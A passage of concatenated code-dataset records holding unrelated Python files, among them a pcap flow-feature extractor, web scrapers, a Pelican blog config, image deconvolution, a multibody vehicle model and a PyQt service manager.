filename)\n","sub_path":"server_2/super_res.py","file_name":"super_res.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"278818121","text":"import pandas as pd\nfrom scapy.all import *\nfrom data import *\n\ndef collect_data():\n\t#pkt_list = rdpcap(\"pcaps/merged_pcap_no_ss_and_ss.pcap\")\n\tpkt_list = rdpcap(\"pcaps/ss_and_no_ss_BIG.pcapng\")\n\tprint(\"Done loading\")\n\ts = pkt_list.sessions()\n\td = {}\n\tip_list = []\n\tcount = 0\n\tcount_all = 0\n\tfor k,v in s.iteritems():\n\t\tcount_all += 1\n\t\tproto = re.search(\"^([^\\s]+)\",k).group()\n\t\tsplit = re.split(\">\",k)\n\t\tip_src = re.search(\"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\",split[0]).group()\n\t\tip_dst = re.search(\"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\",split[1]).group()\n\t\t#if proto == \"TCP\" or proto == \"UDP\":\n\t\tif proto == \"TCP\":\n\t\t\tsrc_prt = re.search(\":(\\d+)\\s\",split[0]).group()[1:-1]\n\t\t\tdst_prt = re.search(\":(\\d+)\",split[1]).group()[1:]\n\t\telse:\n\t\t\tcontinue\n\t\tdirection_flag = True\n\t\tif(\"10.\" in ip_src or \"172.16\" in ip_src or \"172.31\" in ip_src or \"192.168\" in ip_src):\n\t\t\tdirection_flag = True #outflow\n\t\telif(\"10.\" in ip_dst or \"172.16\" in ip_dst or \"172.31\" in ip_dst or \"192.168\" in ip_dst):\n\t\t\tdirection_flag = False #inflow\n\t\telse:\n\t\t\tcontinue\n\t\tif(ip_src < ip_dst): #ip_src first\n\t\t\tif(int(src_prt) < int(dst_prt)):\n\t\t\t\tsrc_dst_pair = ip_src + \":\" + src_prt + \"_\" + ip_dst + \":\" + dst_prt\n\t\t\telse:\n\t\t\t\tsrc_dst_pair = ip_src + \":\" + dst_prt + \"_\" + ip_dst + \":\" + src_prt\n\t\telse: #ip_dst first\n\t\t\tif(int(dst_prt) < int(src_prt)):\n\t\t\t\tsrc_dst_pair = ip_dst + \":\" + dst_prt + \"_\" + ip_src + \":\" + src_prt\n\t\t\telse:\n\t\t\t\tsrc_dst_pair = ip_dst + \":\" + src_prt + \"_\" + ip_src + \":\" + dst_prt\n\t\tk = proto + \"_\" + src_dst_pair\n\t\tif k not in d:\n\t\t\td[k] = []\n\t\t\td[k].append([])\n\t\t\td[k].append([])\n\t\tholder = []\n\t\td[k][direction_flag].append(direction_flag)\n\t\td[k][direction_flag].append(get_flow_duration(v))\n\t\td[k][direction_flag].append(get_min_ia_time(v))\n\t\td[k][direction_flag].append(get_mean_ia_time(v))\n\t\td[k][direction_flag].append(get_max_ia_time(v))\n\t\td[k][direction_flag].append(get_stddev_ia_time(v))\n\t\tholder = get_min_mean_max_pkt_len(v)\n\t\td[k][direction_flag].append(holder[0])\n\t\td[k][direction_flag].append(holder[1])\n\t\td[k][direction_flag].append(holder[2])\n\t\td[k][direction_flag].append(get_stddev_pkt_len(v))\n\t\td[k][direction_flag].append(get_num_pkts(v)) #this fcn and the one above could be combined\n\t\tholder = get_min_mean_max_payload_entropy(v)\n\t\td[k][direction_flag].append(holder[0])\n\t\td[k][direction_flag].append(holder[1])\n\t\td[k][direction_flag].append(holder[2])\n\t\td[k][direction_flag].append(v)\n\n\tprint(\"Done with packet features\")\n\t####### Both Direction Calculations ########\n\tdel_vals = []\n\tdf_dict = {}\n\tfor k, v in d.iteritems():\n\t\tif not d[k][0] or not d[k][1]:\n\t\t\tdel_vals.append(k)\n\tfor i in range(len(del_vals)):\n\t\tdel d[del_vals[i]]\n\tfor k,v in d.iteritems():\n\t\td[k].append(get_out_in_ratio(v))\n\t\tmin_max_burst = get_min_mean_max_burst_len(v)\n\t\td[k].append(min_max_burst[0])\n\t\td[k].append(min_max_burst[1])\n\t\td[k].append(min_max_burst[2])\n\t\td[k].append(is_ss(k))\n\n\t\tdf_dict[k] = []\n\t\tfor i in range(len(d[k][0])-2):\n\t\t\tdf_dict[k].append(d[k][0][i+1])\n\t\tfor i in range(len(d[k][1])-2):\n\t\t\tdf_dict[k].append(d[k][1][i+1])\n\t\tfor i in range(len(d[k])-2):\n\t\t\tdf_dict[k].append(d[k][i+2])\n\tprint(\"Done with flow features\")\n\treturn df_dict\n\ndef set_df_for_ML(df_dict, drop_list):\n\tcolumns = ['i_flow_dur','i_min_ia','i_mean_ia','i_max_ia','i_sdev_ia',\n\t'i_min_len','i_mean_len','i_max_len','i_sdev_len','i_#pkts',\n\t'i_min_e', 'i_mean_e', 'i_max_e',\n\t'o_flow_dur','o_min_ia','o_mean_ia','o_max_ia','o_sdev_ia',\n\t'o_min_len','o_mean_len','o_max_len','o_sdev_len','o_#pkts',\n\t'o_min_e', 'o_mean_e', 'o_max_e',\n\t'biflow_rat', 'min_burst', 'mean_burst', 'max_burst',\n\t'is_ss']\n\tdf_data = pd.DataFrame()\n\tdf_data = df_data.from_dict(df_dict, orient='index')\n\tdf_data.columns = columns\n\n\tdf_data = drop_cols(df_data, drop_list)\n\n\tlen_col = len(df_data.columns)\n\tcounts = df_data['is_ss'].value_counts()\n\tdiff0 = counts[0] - counts[1]\n\tdiff = abs(diff0)\n\tif(diff0 > 0): # more SS data than no_SS data\n\t\tvals = df_data[df_data['is_ss'] == 0]\n\t\tindex_to_remove = np.random.choice(len(vals), diff, replace=False) #vector of random ints from 0 to max index of computer articles\n\t\t#print(\"num entries to randomly remove\", len(index_to_remove))\n\t\tvals = vals.drop(vals.index[index_to_remove]) #drop random ints\n\t\t#print(\"num no_SS data after removal\", len(vals))\n\t\tbig_temp = df_data.drop(df_data[(df_data.is_ss==0)].index)\n\t\tdf_data = big_temp.append(vals)\n\telif(diff0 < 0):\n\t\tvals = df_data[df_data['is_ss'] == 1]\n\t\tindex_to_remove = np.random.choice(len(vals), diff, replace=False) #vector of random ints from 0 to max index of computer articles\n\t\tvals = vals.drop(vals.index[index_to_remove]) #drop random ints\n\t\tbig_temp = df_data.drop(df_data[(df_data.is_ss==1)].index)\n\t\tdf_data = big_temp.append(vals)\n\n\treturn [df_data, columns, len_col]\n\n\ndef drop_cols(df_data, drop_list):\n\tfor key in drop_list:\n\t\tdel df_data[key]\n\treturn df_data\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"210616560","text":"class Solution:\n # @return an integer\n def atoi(self, string):\n INT_MAX = 2147483647; INT_MIN = -2147483648; bound = INT_MAX/10\n string = string.strip()\n sign = 1\n if string.startswith('+'):\n string = string[1:]\n elif string.startswith('-'):\n sign = -1\n string = string[1:]\n\n res = 0\n i = 0\n while ibound or (res==bound and num > 7)):\n return INT_MAX if sign == 1 else INT_MIN\n res = res * 10 + num #this is the key computation for processing int from left to right, digit by digit\n i += 1\n return res*sign\n\nprint(Solution().atoi(\"2147483648\"))","sub_path":"algorithm/string-to-integer.py","file_name":"string-to-integer.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"217385685","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nimport time\nfrom urllib.parse import urlparse\n\ndef get_domain(url):\n ''' Return just the domain (and subdomain!) for a url\n '''\n parsed_uri = urlparse(url)\n domain = '{uri.netloc}'.format(uri=parsed_uri)\n domain = domain.replace('www.', '')\n\n return domain\n\n\nJINJA_FILTERS = {\n 'get_domain':get_domain,\n}\n\nLAST_UPDATE = str(time.strftime('%m %Y'))\nYEAR = str(time.strftime('%Y'))\n\nSITEURL = ''\nAUTHOR = u'Joe Hand'\nAUTHOR_LINKS = {\n 'INSTAGRAM' : 'http://instagram.com/joeahand',\n 'GITHUB' : 'https://github.com/joehand',\n 'TWITTER' : 'http://twitter.com/joeahand/',\n # use html entities to obfuscate for spammers (http://stackoverflow.com/questions/748780/best-way-to-obfuscate-an-e-mail-address-on-a-website)\n 'EMAIL' : 'joe@joeahand.com'\n}\nSITENAME = u'Joe Hand'\nSITESUBTITLE = u'Better cities with local data'\n\nNAV_PAGES = ['about', 'cv']\n\nTHEME = 'themes/joe/'\n\nPATH = 'content'\n\nTIMEZONE = 'US/Mountain'\n\nDEFAULT_LANG = u'en'\nDEFAULT_DATE_FORMAT = '%Y-%B-%d'\n\nDIRECT_TEMPLATES = ('index', 'tags', 'categories', 'archives','sitemap')\n\nSITEMAP_SAVE_AS = 'sitemap.xml'\n\nSTATIC_PATHS = []\nPLUGIN_PATHS = [\"plugins\", 'plugins/pelican-plugins']\nPLUGINS = [\n 'assets',\n 'pelican_gdocs'\n ]\n# PLUGIN Settings\nGITHUB_USER = 'joehand'\nGDOCS = [\n {\n 'name':'instagram',\n 'url':'http://docs.google.com/spreadsheets/d/16KHyJyTGvOIFKTR5uUHrXKWH3kf-UiucCwXfceFet0k/pub?gid=0&single=true&output=csv'\n },\n {\n 'name':'articles',\n 'url':'http://docs.google.com/spreadsheets/d/1Wav1nDxtOTRm3WMLL3RI0oqApxLjBxzTcPftWsCn6x4/pub?gid=0&single=true&output=csv'\n },\n {\n 'name':'fitbit_activity',\n 'url':'http://docs.google.com/spreadsheets/d/1AZRyvrcm-Stk0VlWoPEHD4sxe1PTOdEpU2MejRzHB7s/pub?gid=0&single=true&output=csv'\n },\n {\n 'name':'tweets',\n 'url':'http://docs.google.com/spreadsheets/d/1qRuICBJWHQQ34ujTXkY8jh7obJuVJ_quLbwMrBiQFyg/pub?gid=0&single=true&output=csv'\n },\n {\n 'name':'steps',\n 'url':'https://docs.google.com/spreadsheets/d/1AZRyvrcm-Stk0VlWoPEHD4sxe1PTOdEpU2MejRzHB7s/pub?gid=0&single=true&output=csv'\n },\n {\n 'name':'coffee',\n 'url':'https://docs.google.com/spreadsheets/d/1fsaSy8HJdoTr5iUX7p-iCxUwC-TFzZxnqNzt6mMP26s/pub?gid=0&single=true&output=csv'\n },\n]\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nARTICLE_URL = 'archive/{slug}/'\nARTICLE_SAVE_AS = 'archive/{slug}/index.html'\nPAGE_URL = '{slug}/'\nPAGE_SAVE_AS = '{slug}/index.html'\nCATEGORY_URL = 'category/{slug}/'\nCATEGORY_SAVE_AS = 'category/{slug}/index.html'\nTAG_URL = ''\nTAG_SAVE_AS = ''\nAUTHOR_URL = ''\nAUTHOR_SAVE_AS = ''\nARCHIVES_URL = 'archive/'\nARCHIVES_SAVE_AS = 'archive/index.html'\n#YEAR_ARCHIVE_SAVE_AS = 'posts/{date:%Y}/index.html'\n\nDEFAULT_PAGINATION = 5\nPAGINATION_PATTERNS = (\n (1, '{base_name}/', '{base_name}/index.html'),\n (2, '{base_name}/{number}/', '{base_name}/{number}/index.html'),\n)\n\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n\n#SPECIAL THEME SETTINGS\nHOME_PAGE = {\n 'content' : 'home',\n 'count' : 0,\n 'partial' : True,\n 'links' : [\n ('Projects',SITEURL + '#test'),\n ('Longer Bio',SITEURL + '/about/'),\n ('Writing','http://medium.com/@joehand'),\n ]\n}\n\nCOPYRIGHT_LINK = 'http://creativecommons.org/licenses/by-nc-nd/4.0/'\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"70944817","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\n\ndef get_html(url):\n response = requests.get(url)\n if response.ok:\n return response.text\n raise ConnectionError('Что-то пошло не так!')\n\n\ndef get_next_page(html, url):\n soup = BeautifulSoup(html, 'lxml')\n next_page = url + soup.find(\n 'div', class_='list-pager-div'\n ).find('a', id='pager_next').get('href')\n return next_page\n\n\ndef normalize_num(string):\n rez = ''\n for el in string:\n if el.isdigit():\n rez += el\n return rez\n\n\ndef write_csv(data):\n with open('data.csv', 'a', newline='') as file:\n writer = csv.writer(file, delimiter=';')\n writer.writerow(data)\n\n\ndef get_info(start_url, addition_url):\n html = get_html(start_url)\n while True:\n soup = BeautifulSoup(html, 'lxml')\n all_devise = soup.find(\n 'form', id='list_form1'\n ).find_all(\n 'div', class_=r\"model-short-div\"\n )\n for device in all_devise:\n\n try:\n name = device.find('a').find('span', class_='u').text\n price = device.find(\n 'div', class_='model-price-range'\n ).find_all('span')\n except:\n continue\n start_price = normalize_num(price[0].text)\n end_price = normalize_num(price[1].text)\n if end_price == '':\n end_price = start_price\n url = addition_url + device.find('a').get('href')\n write_csv((name, start_price, end_price, url))\n # print(name, start_price, end_price, url)\n try:\n next_page_url = get_next_page(html, addition_url)\n print(next_page_url)\n html = get_html(next_page_url)\n except:\n break\n\n\ndef main():\n url = 'https://www.e-katalog.ru/list/170/'\n get_info(url, 'https://www.e-katalog.ru')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"course/ekatalog_parser.py","file_name":"ekatalog_parser.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"226148472","text":"\"\"\"Draw five stars, but between each, pick up the pen, move forward by 350 units,\nturn right by 144, put the pen down, and draw the next star.\"\"\"\nimport turtle\n\n\ndef drawStar(t):\n angle = 144\n size = 100\n\n for i in range(5):\n t.forward(size)\n t.right(angle)\n\n\ndef main():\n wn = turtle.Screen() # Set up the window\n wn.bgcolor(\"lightgreen\")\n\n tess = turtle.Turtle() # create tess\n\n for i in range(5):\n drawStar(tess)\n tess.penup()\n tess.forward(350)\n tess.right(144)\n tess.pendown()\n\n wn.exitonclick()\n\n\nmain()\n","sub_path":"Chp_6/6.15.py","file_name":"6.15.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"193179735","text":"import numpy as np\nfrom utilities import *\nimport matplotlib.pyplot as plt\nfrom scipy.ndimage import gaussian_filter\n\ndef main():\n fig = plt.figure()\n img = load_image()\n fig.add_subplot(2, 2, 1)\n plt.imshow(img)\n # gaussian kernel\n kernel = gkern(11, 3)\n # kernel = np.array([[1, 4, 7, 4, 1], [4, 16, 26, 16, 4], [7, 26, 41, 26, 7], [4, 16, 26, 16, 4], [1, 4, 7, 4, 1]], np.float32)\n # kernel = kernel / 273\n # kernel = np.ones((11, 11))/121\n\n # noise\n # noise = np.zeros(img.shape)\n # noise = np.clip(noise, -0.3, 0.3)\n img = np.clip(img, 0, 1)\n\n conv_img = np.array([])\n # fig.add_subplot(2, 2, 2)\n # plt.imshow(img)\n\n for ch in range(3):\n # channel\n img_ch = img[:, :, ch]\n # Fast Fourier Transform\n img_fft = np.fft.fft2(img_ch)\n kernel_fft = np.fft.fft2(kernel, img_ch.shape)\n # elementwise multiply\n conv_fft = img_fft * kernel_fft\n # inverse fft\n conv_img_ch = np.fft.ifft2(conv_fft)\n h, w = conv_img_ch.shape\n conv_img_ch = np.reshape(conv_img_ch, (h, w, 1))\n # pick real number, merge channel\n conv_img_ch = conv_img_ch.real\n if len(conv_img) != 0:\n conv_img = np.append(conv_img, conv_img_ch, axis=2)\n else:\n conv_img = conv_img_ch\n\n noise = np.random.normal(0, 0.01, img.shape)\n # noise = np.zeros(img.shape)\n\n tmp_img = np.clip(conv_img, 0, 1)\n tmp_img = tmp_img * 255\n tmp_img = tmp_img.astype(np.uint8)\n fig.add_subplot(2, 2, 2)\n plt.imshow(tmp_img)\n\n conv_img = conv_img + noise\n\n tmp_img = np.clip(conv_img, 0, 1)\n tmp_img = tmp_img * 255\n tmp_img = tmp_img.astype(np.uint8)\n fig.add_subplot(2, 2, 3)\n plt.imshow(tmp_img)\n\n res_img = np.array([])\n for ch in range(3):\n conv_ch = conv_img[:, :, ch]\n # Fast Fourier Transform\n kernel_fft = np.fft.fft2(kernel, conv_ch.shape)\n conj_kernel_fft = np.conjugate(kernel_fft)\n conv_fft = np.fft.fft2(conv_ch)\n noise_fft = np.fft.fft2(noise[:,:,ch])\n # noise_fft = 0\n wiener_filter = (conj_kernel_fft * conv_fft) / ((kernel_fft.real ** 2 + kernel_fft.imag ** 2) * conv_fft + noise_fft)\n\n res_img_ch = np.fft.ifft2(wiener_filter * conv_fft)\n h, w = res_img_ch.shape\n res_img_ch = np.reshape(res_img_ch, (h, w, 1))\n res_img_ch = res_img_ch.real\n if len(res_img) != 0:\n res_img = np.append(res_img, res_img_ch, axis=2)\n else:\n res_img = res_img_ch\n\n res_img = np.clip(res_img, 0, 1)\n res_img = res_img * 255\n res_img = res_img.astype(np.uint8)\n tmp = Image.fromarray(res_img)\n\n fig.add_subplot(2, 2, 4)\n plt.imshow(res_img)\n plt.show()\n\nmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"53417106","text":"import time\nfrom datetime import datetime\nfrom time import gmtime, strftime\nfrom selenium import webdriver\nimport csv\nimport re\n\nchrome_path = r\"D:/chromedriver.exe\"\ndriver = webdriver.Chrome(chrome_path) # Optional argument, if not specified will search path.\n\ncounter = 0\nRIGHTnow = time.localtime(time.time());\nRIGHTtodaysDate = strftime(\"%d-%m-%Y\", RIGHTnow);\n\nfor z in range(15,30):\n for k in range(1, 6): # walk through dates ( 1 to 5 )\n now = time.localtime(time.time() + (24 * 3600 * z));\n tomorrow = time.localtime(time.time() + (24 * 3600 * k) + (24 * 3600 * z))\n\n todaysDate = strftime(\"%m/%d/%Y\", now)\n todaysDate2 = strftime(\"%d-%m-%Y\", now)\n\n tomorrowsDate = strftime(\"%m/%d/%Y\", tomorrow)\n tomorrowsDate2 = strftime(\"%d-%m-%Y\", tomorrow)\n\n checkin_monthday = strftime(\"%d\", now)\n checkin_month = strftime(\"%m\", now)\n checkin_year = strftime(\"%Y\", now)\n\n checkout_monthday = strftime(\"%d\", tomorrow)\n checkout_month = strftime(\"%m\", tomorrow)\n checkout_year = strftime(\"%Y\", tomorrow)\n\n endDate = tomorrowsDate\n\n # driver.get('https://www.expedia.com/Hotel-Search?destination=New+York%2C+New+York&latLong=40.75668%2C-73.98647®ionId=178293&startDate=\" + _startDate + \"&endDate=\" + _endDate + \"&rooms=1&adults=1');\n driver.get(\n 'https://www.expedia.com/Hotel-Search?destination=New+York%2C+NY+%28LGA-LaGuardia%29&latLong=40.77429%2C-73.872035®ionId=4278092&startDate='+todaysDate+'&endDate='+endDate+'&rooms=1&adults=1');\n\n\n time.sleep(7)\n\n blocks = driver.find_elements_by_class_name(\"listing\")\n num_of_blocks = len(blocks)\n\n try:\n with open('expedia2.csv', 'r') as file1:\n existingLines = [line for line in csv.reader(file1, delimiter=',')]\n except:\n existingLines = []\n\n with open('expedia2.csv', mode='a', newline='') as employee_file:\n employee_writer = csv.writer(employee_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for i in range(num_of_blocks):\n try:\n hotelName = blocks[i].find_element_by_tag_name(\"h3\");\n hotelPrice = blocks[i].find_element_by_xpath(\"//span[@data-stid='content-hotel-lead-price']\"); # Updated\n hotelRank = blocks[i].find_element_by_class_name(\"listing__reviews\");\n hotelRank = hotelRank.find_elements_by_tag_name('span')\n hotelRating = hotelRank[0].text;\n\n if (\"reviews\" in hotelRank[1].text):\n hotelReviews = hotelRank[1].text;\n else:\n hotelReviews = hotelRank[2].text;\n\n hotelReviews = re.sub(' reviews\\)', '', hotelReviews);\n hotelReviews = re.sub('\\(', '', hotelReviews);\n\n hotelName = hotelName.text;\n\n if (\"reviews\" in hotelReviews):\n continue;\n\n # Checks if the data already exists !!\n if [\n RIGHTtodaysDate,\n todaysDate2,\n tomorrowsDate2,\n hotelName,\n hotelPrice.text,\n hotelRating,\n hotelReviews\n ] not in existingLines:\n employee_writer.writerow([\n RIGHTtodaysDate,\n todaysDate2,\n tomorrowsDate2,\n hotelName,\n hotelPrice.text,\n hotelRating,\n hotelReviews\n ])\n counter = counter + 1\n\n print(hotelName)\n print(hotelPrice.text)\n print(hotelRating)\n print(hotelReviews)\n\n except:\n print(\"not found\")\n\ndriver.quit()\nprint(\"rows added: \" + counter.__str__())\nprint(\"done\")","sub_path":"venv/expedia2.py","file_name":"expedia2.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"569738077","text":"# standard library imports\nimport os\n\n# uraeus imports\nfrom uraeus.smbd.systems import template_topology, configuration\n\n# getting directory of current file and specifying the directory\n# where data will be saved\ndir_name = os.path.abspath(os.path.dirname(__file__))\ndata_dir = os.path.join(dir_name, 'data')\ndatabase_directory = os.path.abspath(os.path.join(dir_name, '../../../'))\n\n# ============================================================= #\n# Symbolic Topology\n# ============================================================= #\n\n# Creating the symbolic topology as an instance of the\n# standalone_topology class\nproject_name = 'drive_shafts_v2'\nsym_model = template_topology(project_name)\n\n# Adding Bodies\n# =============\n\n# Drive Shafts\nsym_model.add_body('inner_shaft', mirror=True)\nsym_model.add_body('coupling_inner', mirror=True)\nsym_model.add_body('coupling_outer', mirror=True)\n\n# Helper Bodies\nsym_model.add_body('differential', virtual=True)\nsym_model.add_body('wheel_hub', virtual=True, mirror=True)\n\n# Adding Joints\n# =============\nsym_model.add_joint.revolute('diff_joint', 'rbr_inner_shaft', 'vbs_differential', mirror=True)\nsym_model.add_joint.universal('inner_cv', 'rbr_inner_shaft', 'rbr_coupling_inner', mirror=True)\nsym_model.add_joint.translational('coupling_trans', 'rbr_coupling_inner', 'rbr_coupling_outer', mirror=True)\nsym_model.add_joint.universal('outer_cv', 'rbr_coupling_outer', 'vbr_wheel_hub', mirror=True)\n\n# Adding Forces\n# =============\nsym_model.add_force.local_torque('drive', 'rbr_inner_shaft', mirror=True)\n\n\n# Assembling and Saving the model\nsym_model.save(data_dir)\nsym_model.assemble()\n\n# ============================================================= #\n# Symbolic Configuration\n# ============================================================= #\n\n# Symbolic configuration name.\nconfig_name = '%s_cfg'%project_name\n\n# Symbolic configuration instance.\nsym_config = configuration(config_name, sym_model)\n\n# Adding the desired set of UserInputs\n# ====================================\nsym_config.add_point.UserInput('inner_cv', mirror=True)\nsym_config.add_point.UserInput('outer_cv', mirror=True)\nsym_config.add_point.UserInput('diff_input', mirror=True)\n\nsym_config.add_vector.UserInput('x')\nsym_config.add_vector.UserInput('y')\nsym_config.add_vector.UserInput('z')\n\n# Defining Relations between original topology inputs\n# and our desired UserInputs.\n# ===================================================\nsym_config.add_point.Centered('coupling_mid', ('hpr_inner_cv', 'hpr_outer_cv'), mirror=True)\n\n# Inner CV Joint:\n# ===============\nsym_config.add_relation.Equal_to('pt1_jcr_inner_cv', ('hpr_inner_cv',), mirror=True)\nsym_config.add_relation.Oriented('ax1_jcr_inner_cv', ('hpr_inner_cv', 'hpr_diff_input'), mirror=True)\nsym_config.add_relation.Oriented('ax2_jcr_inner_cv', ('hpr_outer_cv', 'hpr_inner_cv'), mirror=True)\n\n# Outer CV Joint:\n# ===============\nsym_config.add_relation.Equal_to('pt1_jcr_outer_cv', ('hpr_outer_cv',), mirror=True)\nsym_config.add_relation.Oriented('ax1_jcr_outer_cv', ('hpr_outer_cv', 'hpr_inner_cv'), mirror=True)\nsym_config.add_relation.Equal_to('ax2_jcr_outer_cv', ('vcs_y',), mirror=True)\n\n# Coupling Trans Joint:\n# ====================\nsym_config.add_relation.Equal_to('pt1_jcr_coupling_trans', ('hpr_coupling_mid',), mirror=True)\nsym_config.add_relation.Oriented('ax1_jcr_coupling_trans', ('hpr_outer_cv', 'hpr_inner_cv'), mirror=True)\n\n# Differential Joint:\n# ===================\nsym_config.add_relation.Equal_to('pt1_jcr_diff_joint', ('hpr_diff_input',), mirror=True)\nsym_config.add_relation.Equal_to('ax1_jcr_diff_joint', ('vcs_y',), mirror=True)\n\n# Drive Torque:\n# =============\nsym_config.add_relation.Equal_to('ax1_far_drive', ('vcs_y',), mirror=True)\n\n# Creating Geometries\n# ===================\nsym_config.add_scalar.UserInput('shafts_radius')\n\nsym_config.add_geometry.Cylinder_Geometry('inner_shaft', ('hpr_diff_input', 'hpr_inner_cv','s_shafts_radius'), mirror=True)\nsym_config.assign_geometry_to_body('rbr_inner_shaft', 'gmr_inner_shaft', mirror=True)\n\nsym_config.add_geometry.Cylinder_Geometry('coupling_inner', ('hpr_inner_cv', 'hpr_coupling_mid','s_shafts_radius'), mirror=True)\nsym_config.assign_geometry_to_body('rbr_coupling_inner', 'gmr_coupling_inner', mirror=True)\n\nsym_config.add_geometry.Cylinder_Geometry('coupling_outer', ('hpr_coupling_mid', 'hpr_outer_cv','s_shafts_radius'), mirror=True)\nsym_config.assign_geometry_to_body('rbr_coupling_outer', 'gmr_coupling_outer', mirror=True)\n\n\n# Exporing the configuration as a JSON file\nsym_config.export_JSON_file(data_dir)\n\n# ============================================================= #\n# Code Generation\n# ============================================================= #\n\nfrom uraeus.nmbd.python import templatebased_project\nproject = templatebased_project(database_directory)\n\nproject.write_topology_code(sym_model)\n","sub_path":"symenv/templates/drive_shafts_v2/sym_model.py","file_name":"sym_model.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"448976232","text":"alunos = [\n {\n 'nome': 'João',\n 'respostas': [\n 'C',\n 'A',\n 'D',\n 'B',\n 'D'\n ]\n },\n {\n 'nome': 'Maria',\n 'respostas': [\n 'C',\n 'D',\n 'D',\n 'D',\n 'D'\n ]\n }\n]\n\ngabarito = [\n 'A',\n 'A',\n 'B',\n 'A',\n 'A'\n]\n\npeso = [\n 3,\n 2,\n 1,\n 1,\n 3\n]\n\ndef calcular_nota(lista_alunos, gabarito, peso, posicao_aluno):\n aluno = lista_alunos[posicao_aluno]\n lista_respostas = aluno['respostas']\n nome_aluno = aluno['nome']\n contador_gabarito = 0\n contador_peso = 0\n nota_aluno = 0\n for resposta in lista_respostas:\n if resposta == gabarito[contador_gabarito]:\n nota_aluno = nota_aluno + peso[contador_peso]\n contador_gabarito = contador_gabarito + 1\n contador_peso = contador_peso + 1\n print(f'A nota do(a) aluno(a) {nome_aluno} é {nota_aluno}')\n\nprint(calcular_nota(alunos, gabarito, peso, 0))\nprint(calcular_nota(alunos, gabarito, peso, 1))","sub_path":"Exercício 1.py","file_name":"Exercício 1.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"230944832","text":"# -*- coding: utf-8 -*-\n\n# 2019/3/19 0019 上午 9:45 \n\n__author__ = 'RollingBear'\n\nimport config\nimport system_service\n\nimport os\nimport time\n\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtWidgets import QDesktopWidget, QMessageBox, QPushButton, QToolButton, QMenu, QAction, QGridLayout, QLabel\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import Qt\n\n\nclass service_manamgement(QWidget):\n\n def __init__(self):\n\n '''\n Initialization the service management\n '''\n\n super().__init__()\n\n self.conf = config.config('\\\\config\\\\config.ini')\n self.service_list = config.config('\\\\config\\\\service_name.ini')\n\n self.len_count = self.service_list.outer_element_count()\n\n self.red_img = QPixmap(self.conf.get('image_address').red)\n self.green_img = QPixmap(self.conf.get('image_address').green)\n self.yellow_img = QPixmap(self.conf.get('image_address').yellow)\n self.logo_img = QPixmap(self.conf.get('image_address').logo)\n self.message_img = QPixmap(self.conf.get('image_address').message)\n\n self.system_svc = system_service.system_service()\n\n self.init_ui()\n\n def init_ui(self):\n\n '''\n Initialization the service management UI\n :return: None\n '''\n\n self.grid = QGridLayout()\n self.setLayout(self.grid)\n self.grid.setSpacing(10)\n\n for i in range(self.len_count):\n service_display_name = self.service_list.get('service_' + str(i + 1)).service_display_name\n service_name = self.service_list.get('service_' + str(i + 1)).service_name\n service_log = self.service_list.get('service_' + str(i + 1)).service_log\n service_setup = self.service_list.get('service_' + str(i + 1)).service_setup\n\n if service_log == 'Null':\n service_log = None\n else:\n service_log = os.path.abspath(os.path.dirname(os.getcwd()) + os.path.sep + (\n '.' * service_log.count('..\\\\'))) + '\\\\' + service_log.replace('..\\\\', '')\n\n service_setup = os.path.abspath(os.path.dirname(os.getcwd()) + os.path.sep + (\n '.' * service_setup.count('..\\\\'))) + '\\\\' + service_setup.replace('..\\\\', '')\n\n self.paint_tool_button(i, service_display_name, service_name, service_log, service_setup)\n\n self.get_state(i, service_name)\n\n self.mes_label = QLabel(self)\n self.mes_label.setPixmap(self.message_img)\n self.grid.addWidget(self.mes_label, self.len_count + 1, 0, 1, 3)\n\n log_address = self.conf.get('file_address').log_file_address\n self.paint_button('open file', self.len_count + 2, 0, self.system_svc.open_file, log_address)\n self.paint_button('start all', self.len_count + 2, 1, 